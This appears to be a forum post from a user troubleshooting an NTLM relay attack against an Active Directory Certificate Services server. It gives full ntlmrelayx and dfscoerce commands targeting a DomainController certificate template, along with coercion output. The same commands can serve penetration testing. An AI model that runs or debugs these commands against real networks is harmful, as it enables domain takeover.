Hello, is it possible to relay from nat ADCS server for example 192.168.1.10 to remote host in different subnet? I'm trying to relying from remote host with white ip address.

python3 examples/ntlmrelayx.py -debug -t https://192.168.1.10/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

python3 dfscoerce.py -u john.smith -d test.com 139.10.10.10 192.168.1.10
Password:
[-] Connecting to ncacn_np:192.168.1.10[\PIPE\netdfs]
[+] Successfully bound!
[-] Sending NetrDfsRemoveStdRoot!
NetrDfsRemoveStdRoot
ServerName: '139.10.10.10\x00'
RootShare: 'test\x00'
ApiFlags: 1

also i have route into attacking subnet and hosts can ping each other but ntlmrelay can't caught any cert. I have nothing in terminal. Any suggestion? Thanks in advance